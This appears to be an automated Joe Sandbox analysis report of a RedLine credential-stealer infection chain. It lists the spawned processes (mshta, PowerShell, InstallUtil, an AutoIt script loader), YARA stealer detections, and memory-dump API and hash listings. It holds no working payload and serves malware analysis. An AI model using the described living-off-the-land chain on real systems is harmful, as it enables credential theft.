Imagebase:	0x110000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	02:39:04
Start date:	17/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Imagebase:	0xa50000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.1834778236.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000002.1834778236.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	02:39:07
Start date:	17/12/2024
Path:	C:\ehcfdbh\AutoIt3.exe
Wow64 process (32bit):	true
Commandline:	"C:\ehcfdbh\AutoIt3.exe" C:\ehcfdbh\bhcbhah.a3x
Imagebase:	0xc80000
File size:	893'608 bytes
MD5 hash:	C56B5F0201A3B3DE53E561FE76912BFD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000003.1908914429.0000000004770000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001A.00000003.1908914429.0000000004770000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000003.1908716949.0000000004970000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001A.00000003.1908716949.0000000004970000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.1914811430.0000000003FC8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001A.00000002.1914811430.0000000003FC8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	02:39:12
Start date:	17/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Imagebase:	0xc90000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FFE7DE73675 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1388771821.00007FFE7DE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe7de70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: 51f36fd864a072b8d929449632a0cbb872d900fce05a2a6eab1ba7ce72bbc48d
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 2D01A77111CB0C4FD784EF0CE451AA5B3E0FB89360F10052EE58AC3661D632E881CB41

Analysis Process: powershell.exePID: 8108, Parent PID: 7952COMMON

Executed Functions

Function 00007FFE7DE733B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1374953499.00007FFE7DE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe7de70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: c1e2edb88c7d9aeea4aa510620cbe77011363dcb23140e0d4d6363ef67ae7195
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 7E01677111CB0C4FD794EF0CE451AA5B7E0FB95364F10056EE59AC36A1DA36E882CB45

Analysis Process: mshta.exePID: 8188, Parent PID: 8108COMMON

Executed Functions

Function 0000024E67BD0135 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000003.1578246973.0000024E67BD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000024E67BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_24e67bd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f0a9fc88239158ebee19428af61f9b44ff9420f11c8848ae1059c5f3e7f5057
Instruction ID: 951356bb507858dd013cb81c5d3d1d3a91f3d6a693345ddb13f290719b30dc0d
Opcode Fuzzy Hash: 5f0a9fc88239158ebee19428af61f9b44ff9420f11c8848ae1059c5f3e7f5057
Instruction Fuzzy Hash: E211D62151EECC4FEB52D7BC58AD6A07FD0EF6B210B4D05DBC489CB0B2D0148895D382

Function 0000024E67BD120C Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000003.1578266744.0000024E67BD1000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000024E67BD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_24e67bd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a11602fd4b6dda0425560ce888e11d5a19943be727f55c68fb0756463bec29f
Instruction ID: 10caacb0b0f283b414c7e109de132f89823fd702bb3df34208b59bc941ab759e
Opcode Fuzzy Hash: 0a11602fd4b6dda0425560ce888e11d5a19943be727f55c68fb0756463bec29f
Instruction Fuzzy Hash: C001622021DEC80FF74B567C482D3A97BD5EB56215F5B44EBD446CB1F2E8584C858352

Function 0000024E67BD120C Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000003.1578266744.0000024E67BD1000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000024E67BD0000, based on PE: false

Associated: 00000006.00000003.1578246973.0000024E67BD0000.00000010.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_24e67bd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a11602fd4b6dda0425560ce888e11d5a19943be727f55c68fb0756463bec29f
Instruction ID: 10caacb0b0f283b414c7e109de132f89823fd702bb3df34208b59bc941ab759e
Opcode Fuzzy Hash: 0a11602fd4b6dda0425560ce888e11d5a19943be727f55c68fb0756463bec29f
Instruction Fuzzy Hash: C001622021DEC80FF74B567C482D3A97BD5EB56215F5B44EBD446CB1F2E8584C858352

Function 0000024E67AE0F79 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000003.1578294727.0000024E67AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000024E67AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_24e67ae0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: c69bb13414028305f8fb2b90a04ecdb1d5a29add9d28a490a5d3af2adec85b2d
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 469002094A580655E81415D10C8A35D50447398190FE64880446690144D84D02A66152

Function 0000024E67AE0F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000003.1578294727.0000024E67AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000024E67AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_24e67ae0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: c69bb13414028305f8fb2b90a04ecdb1d5a29add9d28a490a5d3af2adec85b2d
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 469002094A580655E81415D10C8A35D50447398190FE64880446690144D84D02A66152

Function 0000024E67AE0F89 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000003.1578294727.0000024E67AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000024E67AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_24e67ae0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: c69bb13414028305f8fb2b90a04ecdb1d5a29add9d28a490a5d3af2adec85b2d
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 469002094A580655E81415D10C8A35D50447398190FE64880446690144D84D02A66152

Function 0000024E67AE0FA9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000003.1578294727.0000024E67AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000024E67AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_24e67ae0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: c69bb13414028305f8fb2b90a04ecdb1d5a29add9d28a490a5d3af2adec85b2d
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 469002094A580655E81415D10C8A35D50447398190FE64880446690144D84D02A66152

Function 0000024E67AE0F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000003.1578294727.0000024E67AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000024E67AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_24e67ae0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: c69bb13414028305f8fb2b90a04ecdb1d5a29add9d28a490a5d3af2adec85b2d
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 469002094A580655E81415D10C8A35D50447398190FE64880446690144D84D02A66152

Function 0000024E67AE0F81 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000003.1578294727.0000024E67AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000024E67AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_24e67ae0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: c69bb13414028305f8fb2b90a04ecdb1d5a29add9d28a490a5d3af2adec85b2d
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 469002094A580655E81415D10C8A35D50447398190FE64880446690144D84D02A66152

Function 0000024E67AE0FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000003.1578294727.0000024E67AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000024E67AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_24e67ae0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: c69bb13414028305f8fb2b90a04ecdb1d5a29add9d28a490a5d3af2adec85b2d
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 469002094A580655E81415D10C8A35D50447398190FE64880446690144D84D02A66152

Analysis Process: powershell.exePID: 1080, Parent PID: 8188COMMON

Executed Functions

Function 00007FFE7CD63A9B Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1573626492.00007FFE7CD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CD60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffe7cd60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f96bd52b9fe1f8da5a60f2fe1bee04bc0261352c7f1ca2308f60d8b54b0a140
Instruction ID: 04f34dce2c62ddb9744796ba813f72f8b206440a86a6b346fdd6c59da1ac3c06
Opcode Fuzzy Hash: 4f96bd52b9fe1f8da5a60f2fe1bee04bc0261352c7f1ca2308f60d8b54b0a140
Instruction Fuzzy Hash: 47F0C823F6EE4A1FE796A26C00152B952D6EFD926176901BBC02DD72AAED59DC034340

Function 00007FFE7CC93A05 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1572954855.00007FFE7CC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffe7cc90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 089ad49c9b16669a8470e1be9b06c23d9390b4199af11dc99310237bacd3f74b
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 4F01A73115CB0C4FD744EF0CE051AA5B3E0FB89360F10052EE58AC3661DB36E882CB42

Function 00007FFE7CD63DF1 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1573626492.00007FFE7CD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CD60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffe7cd60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4295887b3270467ba9268115c1e8117c5f56bc49b41e216860b27603d8056d1
Instruction ID: 9c2c22ce80db19780f1679f6245564f1c98025851d35d47f344bd29b3505c07c
Opcode Fuzzy Hash: e4295887b3270467ba9268115c1e8117c5f56bc49b41e216860b27603d8056d1
Instruction Fuzzy Hash: F8E09233A1C5059FE305A71CE4474FCB3A4EF41230B5401F7E21E87877DA26A852C651

Function 00007FFE7CD604D8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1573626492.00007FFE7CD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CD60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffe7cd60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b8ef5c75ee722b8fc2e0e54a94b1591420ddef36567a8c6ef891dea7eb3565e
Instruction ID: e09f1775ca9e1d3b88f6fc51945737ac2b5cf5962d3e01e718af2753c9ee2719
Opcode Fuzzy Hash: 9b8ef5c75ee722b8fc2e0e54a94b1591420ddef36567a8c6ef891dea7eb3565e
Instruction Fuzzy Hash: 12D0A733B0EC3C1F5BA5E68C78185F87381EB482357044267D91DE3104D910DC1143C4

Function 00007FFE7CD63AEA Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1573626492.00007FFE7CD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CD60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffe7cd60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3698b01e006775e5e7f2befaad2f8fd3def426c93ab8d47a29ff49b760ff2b2
Instruction ID: 45145517e0916117c4637e91248895cb81236737c80fc0de68bef15603a4de53
Opcode Fuzzy Hash: f3698b01e006775e5e7f2befaad2f8fd3def426c93ab8d47a29ff49b760ff2b2
Instruction Fuzzy Hash: 4ED01221B6DD0A4EE395A63C000927551D69FC82417644179801DC6365DD78D8428300

Analysis Process: powershell.exePID: 7036, Parent PID: 1080COMMON

Executed Functions

Function 00007FFE7CD60187 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1750041362.00007FFE7CD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CD60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe7cd60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b16e41b484f5fa23f2c044d30cb173fb37eea5f87262151770e978b9ff3400e
Instruction ID: 0c50b3241dc53571378f1e3913c00cdc4513b6b16545a5e8af181b4c44a4d202
Opcode Fuzzy Hash: 6b16e41b484f5fa23f2c044d30cb173fb37eea5f87262151770e978b9ff3400e
Instruction Fuzzy Hash: F101712130DE498FCF8ADA1CD864C6077E5EB6A354718029BD00ACB2D2DD21EC85C785

Function 00007FFE7CD6019D Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1750041362.00007FFE7CD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CD60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe7cd60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d59f54574fec15aa9a42840852c62934432677ccf94a19f45c1b1773f2e60d96
Instruction ID: 8a9b4bf184d39572ab64b84f25dac67714ea2f996dc42f691bf841113c831b76
Opcode Fuzzy Hash: d59f54574fec15aa9a42840852c62934432677ccf94a19f45c1b1773f2e60d96
Instruction Fuzzy Hash: C6014F3160DA498FCF4AEA28D454C60BBA5EF6A35475802DBD006CB2E3DD25E884CB55

Function 00007FFE7CC93A05 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1749199060.00007FFE7CC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe7cc90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 089ad49c9b16669a8470e1be9b06c23d9390b4199af11dc99310237bacd3f74b
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 4F01A73115CB0C4FD744EF0CE051AA5B3E0FB89360F10052EE58AC3661DB36E882CB42

Analysis Process: updater.exePID: 8800, Parent PID: 7036COMMON

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	19.5%
Signature Coverage:	8.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	59

Executed Functions

Function 016D43BD Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 186
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 016D43D8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 016D43F6
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 016D4414
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 016D4432
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,016D44C1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 016D447B
RegQueryValueExA.ADVAPI32(?,016D463D,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,016D44C1,?,80000001), ref: 016D4499
RegCloseKey.ADVAPI32(?,016D44C8,00000000,00000000,00000005,00000000,016D44C1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 016D44BB
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 016D44D8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 016D44E5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 016D44EB
lstrlen.KERNEL32(00000000), ref: 016D4516
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 016D456B
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 016D457B
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 016D45A7
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 016D45B7
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 016D45E1
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 016D45F1

Strings

Software\Borland\Delphi\Locales, xrefs: 016D4428
Software\Borland\Locales, xrefs: 016D43EC, 016D440A

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: 5d66e715f28186a5ef262d1f344e0f39d60f70679050b2a3293972637e294e5c
Instruction ID: 00f9277066564c2b255fe8f9b3c1fce006dc555148fed6685014cd2ad2f25b46
Opcode Fuzzy Hash: 5d66e715f28186a5ef262d1f344e0f39d60f70679050b2a3293972637e294e5c
Instruction Fuzzy Hash: 27617071F4024A7EEB11DAE8CC85FEFB7BD9B18300F4440A5B645E6681DBB4DA448B64

Function 00325240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0032526C
IsDebuggerPresent.KERNEL32 ref: 0032527E
GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 003252E6

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

Part of subcall function 0031BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0031BC07

SetCurrentDirectoryW.KERNEL32(?), ref: 00325366
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00360B2E
SetCurrentDirectoryW.KERNEL32(?), ref: 00360B66
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003C6D10), ref: 00360BE9
ShellExecuteW.SHELL32(00000000), ref: 00360BF0

Part of subcall function 0032514C: GetSysColorBrush.USER32(0000000F), ref: 00325156
Part of subcall function 0032514C: LoadCursorW.USER32(00000000,00007F00), ref: 00325165
Part of subcall function 0032514C: LoadIconW.USER32(00000063), ref: 0032517C
Part of subcall function 0032514C: LoadIconW.USER32(000000A4), ref: 0032518E
Part of subcall function 0032514C: LoadIconW.USER32(000000A2), ref: 003251A0
Part of subcall function 0032514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 003251C6
Part of subcall function 0032514C: RegisterClassExW.USER32(?), ref: 0032521C

Part of subcall function 003250DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00325109
Part of subcall function 003250DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0032512A
Part of subcall function 003250DB: ShowWindow.USER32(00000000), ref: 0032513E
Part of subcall function 003250DB: ShowWindow.USER32(00000000), ref: 00325147

Part of subcall function 003259D3: _memset.LIBCMT ref: 003259F9
Part of subcall function 003259D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00325A9E

Strings

It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00360B28
AutoIt, xrefs: 00360B23
runas, xrefs: 00360BE4

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 529118366-2030392706
Opcode ID: 7bc8d66009724ae595837087d85c3b98081a08cc1135b680e5f5957696e2b0cf
Instruction ID: f260e0ef7720da80b2601da27cca13b633afb6ea50df0261a14ed8661f2b430c
Opcode Fuzzy Hash: 7bc8d66009724ae595837087d85c3b98081a08cc1135b680e5f5957696e2b0cf
Instruction Fuzzy Hash: C9515C35945298AACF07FBB0FC06EFE7B7CAF19340F104456F551AA1A2DB705A45C721

Function 016D44C7 Relevance: 15.1, APIs: 10, Instructions: 102
stringlibrarythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 016D44D8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 016D44E5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 016D44EB
lstrlen.KERNEL32(00000000), ref: 016D4516
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 016D456B
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 016D457B
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 016D45A7
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 016D45B7
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 016D45E1
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 016D45F1

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID:
API String ID: 1599918012-0
Opcode ID: 9761e91035f57e01ffaef065c1ac89d12249611f77cd6e926a4d7ebbac4f4515
Instruction ID: 894116a2c806941a09d7e1b1d77022800e4864b0b01c0a04e740a358592a916a
Opcode Fuzzy Hash: 9761e91035f57e01ffaef065c1ac89d12249611f77cd6e926a4d7ebbac4f4515
